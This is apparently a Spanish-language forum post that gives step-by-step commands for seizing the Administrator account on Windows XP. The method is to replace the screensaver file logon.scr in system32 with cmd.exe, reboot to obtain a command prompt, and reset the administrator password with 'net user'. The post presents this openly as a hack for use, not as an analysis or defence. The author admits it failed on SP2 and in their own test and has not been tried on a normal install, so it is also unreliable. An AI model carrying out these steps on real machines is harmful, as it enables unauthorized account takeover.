Cambiar la password del usuario Administrador de Windows XP con los
privilegios minimos.
Primero abrimos un Prompt
Vamos al root del directorio:
cd
vamos al directorio system32:
cd \windows\system32
Hacemos un backup del archivo logon.scr y cmd.exe
mkdir temphack
copy logon.scr c:\temphack\logon.scr
copy cmd.exe c:\temphack\cmd.exe
Borramos el archivo original logon.scr
del logon.scr
Luego reemplazamos el archivo logon.scr por cmd.exe (esto habilita un prompt
de DOS en lugar del screen para seleccionar el usuario.)
rename cmd.exe logon.scr
exit
Luego de esto reiniciamos la maquina y notaremos que tendremos acceso a un prompt de DOS.
Si la cuenta del Administrador se llama ArPeGiUs y queremos cambiarle la
contraseña:
net user ArPeGiUs password (donde "password" es la nueva contraseña)
Ahora podemos loguearnos como Administradore s con la nueva contraseña.
Nota: Esta vulnerabilidad solo funciona teniendo acceso fisico y a la
maquina y una cuenta de usuario. Se han reportado casos en donde esta
vulnerabilidad no funciona, posiblemente dependiendo de los parches
instalados en el sistema. ..::NO FUNCIONA EN SP2::
Lo probé en Windows desatendidos y no funciono.. xD...
Me falta probarlo en un Windows normal...
Asi que si alguien lo prueba antes que yo que lo comunique..
Saludos...